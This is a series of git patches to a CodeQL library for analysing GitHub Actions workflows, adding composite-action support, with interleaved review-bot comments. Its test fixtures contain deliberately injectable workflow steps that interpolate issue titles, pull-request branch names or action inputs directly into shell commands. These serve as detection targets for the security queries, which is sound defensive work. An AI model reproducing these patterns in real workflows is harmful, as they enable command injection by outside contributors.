+++ b/ql/src/test/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + From 99358c62e2e1a252a9e38dfdab8d51bb3d43a499 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:47:27 +0100 Subject: [PATCH 0021/1267] Extend CFG to reach env expressions --- ql/lib/codeql/actions/Ast.qll | 68 +++++++++++++------ .../actions/controlflow/internal/Cfg.qll | 6 +- ql/lib/test/test.ql | 14 +--- 3 files changed, 53 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ec05fa309d3..61f2d8e91d7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -184,26 +184,6 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -238,7 +218,25 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) } - override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + override Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** 
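Review bot: The three-branch step/job/workflow lookup that lived once on `StepStmt.getEnvExpr` is now pasted verbatim into `StepUsesExpr.getEnvExpr` here and into `RunExpr.getEnvExpr` in the next hunk, with a third near-copy already in `JobUsesExpr`. Any later fix to env resolution, such as scoping or precedence, has to be repeated in each copy, and the doc comments already differ ("current step" versus "current node"). If the move was needed to avoid an override conflict, a private helper predicate taking the step, called from one-line overrides, would keep the copies in sync.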
@@ -317,6 +315,26 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -420,5 +438,11 @@ class EnvAccessExpr extends ExprAccessExpr { EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } - override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } + override Expression getRefExpr() { + exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(RunExpr s | s.getEnvExpr(varName) = result) + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 9129ee5dc61..0dd34ff926f 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -227,7 +227,8 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by 
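Review bot: `StepUsesTree.getChildNode` now ranks `super.getEnvExpr(_)` among the step's children, but `getEnvExpr` also returns expressions from the job-level and workflow-level `env` mappings, which are not syntactically inside the step. Those nodes would become a child of every `uses` step in the job, and of steps in every job for workflow-level entries. A pre-order tree presumably does not expect a shared child, though I have not checked how the shared CFG library handles it. Limiting the CFG children to the step's own `env` entries and leaving the wider lookup to the data-flow side would avoid the question. `JobUsesTree` in the following hunk gets the same change.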
@@ -240,7 +241,8 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index fe76852fa53..36c268ecc99 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -31,10 +31,6 @@ query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNod query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } -query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { - id = va.getStepId() and var = va.getVarName() -} - query predicate orphanVarAccesses(ExprAccessExpr va, string var) { var = va.getExpression() and not exists(AstNode n | n = va.getParentNode()) 
@@ -53,25 +49,21 @@ query predicate cfgNodes(Cfg::Node n) { } query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "simple1.yml" + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" } query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } - query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } -query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } - query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string trigger, string kind) { + sourceModel(action, version, output, trigger, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { From e9707af38df5af35813eb01dd4fa70d7bbcb1eec Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 22:55:58 +0100 Subject: [PATCH 0022/1267] feat: support for composite action's analysis --- ql/lib/codeql/actions/Ast.qll | 88 ++++++++++--------- .../actions/controlflow/internal/Cfg.qll | 44 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 9 +- .../dataflow/internal/DataFlowPublic.qll | 7 +- ql/lib/test/test.ql | 2 +- .../CWE-020/CompositeActionSummaries.ql | 36 ++++++++ .../CWE-020/CompositeActionsSources.ql | 38 ++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../.github/workflows/calling_composite.yml | 14 +++ .../test/.github/workflows/changed-files.yml | 2 - ql/src/test/composite-actions/action.yml | 50 +++++++++++ 13 files changed, 243 insertions(+), 62 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionSummaries.ql create mode 100644 ql/src/Security/CWE-020/CompositeActionsSources.ql create mode 100644 ql/src/test/.github/workflows/calling_composite.yml create mode 100644 ql/src/test/composite-actions/action.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 61f2d8e91d7..0685b2fc14d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -27,6 +27,25 @@ class Statement extends AstNode { } */ class Expression extends Statement { } +/** + * A composite action + */ +class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { + RunsStmt getRunsStmt() { result = super.getRuns() } + + InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class RunsStmt extends Statement instanceof Actions::Runs { + StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } + + StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } +} + /** * A Github Actions Workflow */ 
@@ -43,67 +62,45 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ReusableWorkflowInputsStmt getInputsStmt() { - result = workflow_call.(YamlMapping).lookup("inputs") - } + InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } - ReusableWorkflowOutputsStmt getOutputsStmt() { - result = workflow_call.(YamlMapping).lookup("outputs") - } + OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowInputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) - } +class InputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + InputsStmt() { parent.lookup("inputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * inputs: - * config-path: - * required: true - * type: string - * secrets: - * token: - * required: true + * Gets a specific input expression (YamlMapping) by name. */ - ReusableWorkflowInputExpr getInputExpr(string name) { + InputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } +class OutputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; -class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowOutputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) - } + OutputsStmt() { parent.lookup("outputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. 
- * eg: - * on: - * workflow_call: - * outputs: - * firstword: - * description: "The first output string" - * value: ${{ jobs.example_job.outputs.output1 }} - * secondword: - * description: "The second output string" - * value: ${{ jobs.example_job.outputs.output2 }} + * Gets a specific output expression (YamlMapping) by name. */ - ReusableWorkflowOutputExpr getOutputExpr(string name) { + OutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class InputExpr extends Expression instanceof YamlString { } + +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -369,7 +366,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } override Expression getRefExpr() { - this.getJobStmt() = result.(StepStmt).getJobStmt() and + this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId } } @@ -413,10 +410,10 @@ class JobOutputAccessExpr extends ExprAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { +class InputAccessExpr extends ExprAccessExpr { string paramName; - ReusableWorkflowInputAccessExpr() { + InputAccessExpr() { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } 
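Review bot: `StepOutputAccessExpr.getRefExpr` in the `@@ -369,7 +366,7 @@` hunk relaxes the match from same job to same file, but step ids are only unique within a job. With two jobs in one workflow file that both contain a step `id: x`, `${{ steps.x.outputs.y }}` now resolves to both steps, so a tainted output in one job appears to flow to a read in the other. Presumably the change is there because composite-action steps have no job. Keeping the job comparison whenever the access has an enclosing job would preserve the earlier precision, e.g. `if exists(this.getJobStmt()) then this.getJobStmt() = result.(StepStmt).getJobStmt() else this.getLocation().getFile() = result.getLocation().getFile()`.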
@@ -425,6 +422,11 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) + or + exists(CompositeActionStmt a | + a.getLocation().getFile() = this.getLocation().getFile() and + a.getInputsStmt().getInputExpr(paramName) = result + ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0dd34ff926f..bb0c25dbdf6 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -88,6 +88,8 @@ module CfgScope { abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + + class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } } private module Implementation implements CfgShared::InputSig { @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(WorkflowStmt), e) or + first(scope.(CompositeActionStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(WorkflowStmt), e, c) or + last(scope.(CompositeActionStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
@@ -139,6 +147,28 @@ private import CfgImpl private import Completion private import CfgScope +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + ( + child = this.(CompositeActionStmt).getInputsStmt() or + child = this.(CompositeActionStmt).getOutputsStmt() or + child = this.(CompositeActionStmt).getRunsStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { + override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +} + private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { if this instanceof ReusableWorkflowStmt @@ -169,8 +199,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt -{ +private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -183,10 +212,9 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } +private class InputExprTree extends LeafTree instanceof InputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt -{ +private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
@@ -199,7 +227,7 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 120444863e5..fae6c74b0b3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -161,3 +161,14 @@ private class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = soutceType } } + +/** + * Composite action input sources + */ +private class CompositeActionInputSource extends RemoteFlowSource { + CompositeActionStmt c; + + CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + + override string getSourceType() { result = "Composite action input" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cafd6083276..750a4011320 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -83,7 +83,7 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { line = script.splitAt("\n") and ( line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ee59e25ab20..79bd48b395a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
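Review bot: `CompositeActionInputSource` treats every declared input of every composite action as a `RemoteFlowSource`, with no condition on how the action is called, and the doc comment does not state that assumption. Someone triaging a result needs to know the finding is conditional on a caller passing attacker-controlled data. I would expand the comment to something like `/** Inputs of a composite action, assumed attacker-controlled because the callers are not visible here. */`. The field `c` is only used inside the characteristic predicate, so `any(CompositeActionStmt c).getInputsStmt().getInputExpr(_) = this.asExpr()` would avoid carrying it as a field.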
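Review bot: The new pattern `".*>>\\s*\\$GITHUB_OUTPUT.*"` only matches the bare form, so the commonly used `>> "$GITHUB_OUTPUT"` and `>> ${GITHUB_OUTPUT}` spellings are not recognised. A step that writes tainted data to its output using either of them produces no taint step, which is a silent false negative. Allowing an optional quote and optional braces covers them: `line.regexpMatch(".*>>\\s*[\"']?\\$\\{?GITHUB_OUTPUT\\}?.*")`. The enclosing predicate `runEnvToScriptstep` starts above the hunk and continues below it.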
@@ -82,7 +82,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else none() + else + if this instanceof CompositeActionStmt + then result = this.(CompositeActionStmt).getName() + else none() } } @@ -190,11 +193,11 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { } /** - * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + exists(Expression astFrom, InputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a14b0693874..d83608dc2b8 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,7 +48,7 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private ReusableWorkflowInputExpr parameter; + private InputExpr parameter; ParameterNode() { this.asExpr() = parameter and @@ -63,7 +63,7 @@ class ParameterNode extends ExprNode { override Location getLocation() { result = parameter.getLocation() } - ReusableWorkflowInputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = parameter } } /** 
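Review bot: A point of style on `DataFlowCallable.getName`: the nested `if … then … else if … then … else none()` grows by one level for each new callable kind. The casts already restrict the receiver, so a disjunction reads more directly: `result = this.(ReusableWorkflowStmt).getName() or result = this.(CompositeActionStmt).getName()`. This is equivalent as long as no node is both a reusable workflow and a composite action, which seems to be the intent but is not shown in the hunk.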
@@ -87,7 +87,8 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) + (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or + node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 36c268ecc99..4b2be43bbda 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -45,7 +45,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof ReusableWorkflowOutputsStmt + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql new file mode 100644 index 00000000000..46a7797e2b2 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql 
@@ -0,0 +1,36 @@ +/** + * @name Composite Action Summaries + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-summaries + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql new file mode 100644 index 00000000000..09556ac1b78 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
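Review bot: The query header declares `@security-severity 9.3`, `@precision high` and `external/cwe/cwe-020`, while the select message is just "Summary" and the query reports any input-to-output flow inside a composite action. That looks like a helper for deriving flow summaries rather than a vulnerability finding. If so, the severity and CWE tag would surface every pass-through action as a critical alert wherever the query is included in a suite. I would drop the `@security-severity` line and the CWE tag, and change `@description` to say the query lists input-to-output flows for modelling. CompositeActionsSources.ql, added in the next file section, has the same header and the same `@description` text and needs the same treatment.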
@@ -0,0 +1,38 @@ +/** + * @name Composite Action Sources + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sources + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and + not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 7953c3b037c..6860f091d5e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 9.3 * @precision high - * @id actions/command-injection + * @id actions/expression-injection * @tags actions * security * external/cwe/cwe-094 diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/src/test/.github/workflows/calling_composite.yml new file mode 100644 index 00000000000..79c2d072ef5 --- /dev/null +++ b/ql/src/test/.github/workflows/calling_composite.yml 
@@ -0,0 +1,14 @@ +on: [push] + +jobs: + hello_world_job: + runs-on: ubuntu-latest + name: A job to say hello + steps: + - uses: actions/checkout@v4 + - id: foo + uses: some-org/test-action@v1 + with: + who-to-greet: ${{ github.event.pull_request.head.ref }} + - run: echo ${{ steps.foo.outputs.reflected}} + - run: echo ${{ steps.foo.outputs.tainted}} diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml index 0a47960517f..12bade510ba 100644 --- a/ql/src/test/.github/workflows/changed-files.yml +++ b/ql/src/test/.github/workflows/changed-files.yml @@ -13,8 +13,6 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - # Example 1 - name: Get changed files id: changed-files uses: tj-actions/changed-files@v40 diff --git a/ql/src/test/composite-actions/action.yml b/ql/src/test/composite-actions/action.yml new file mode 100644 index 00000000000..c43d5fd6694 --- /dev/null +++ b/ql/src/test/composite-actions/action.yml 
@@ -0,0 +1,50 @@ +name: 'Hello World' +description: 'Greet someone' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + reflected: + description: "Reflected input" + value: ${{ steps.reflector.outputs.reflected }} + tainted: + description: "Reflected input" + value: ${{ steps.source.outputs.tainted}} + +runs: + using: "composite" + steps: + - name: Secure Set Greeting + run: echo "Hello $INPUT_WHO_TO_GREET." + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - name: Remove foo + id: replace + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ inputs.who-to-greet }} + find: 'foo' + replace: '' + - id: sink + run: echo ${{ steps.replace.outputs.value }} + shell: bash + - name: Vulnerable Set Greeting + run: echo "Hello ${{ inputs.who-to-greet }}." + shell: bash + - id: reflector + run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - id: changed-files + uses: tj-actions/changed-files@v40 + - id: source + run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT + shell: bash + env: + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + + From cc3f2eed68329d37539675aa3a15c3798495feb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:24:16 +0100 Subject: [PATCH 0023/1267] add characteristic predicates to InputExpr and OutputExpr --- ql/lib/codeql/actions/Ast.qll | 10 ++++++---- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +----- 2 files changed, 7 insertions(+), 9 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0685b2fc14d..c7573dfb839 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -96,11 +96,13 @@ class OutputsStmt extends Statement instanceof YamlMapping { } } -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class InputExpr extends Expression instanceof YamlString { } +class InputExpr extends Expression instanceof YamlString { + InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } +} -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class OutputExpr extends Expression instanceof YamlString { } +class OutputExpr extends Expression instanceof YamlString { + OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } +} /** * A Job is a collection of steps that run in an execution environment. diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index bb0c25dbdf6..8d044c827a2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -35,11 +35,7 @@ module Completion { override string toString() { result = "BooleanCompletion(" + value + ")" } - override predicate isValidForSpecific(AstNode e) { - none() - // TODO: add support for conditional expressions? - //e = any(ConditionalExpression c).getCondition() - } + override predicate isValidForSpecific(AstNode e) { none() } override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } From 271c512f4d05ba0778c81b8c9e8b553560631a72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:40:22 +0100 Subject: [PATCH 0024/1267] better 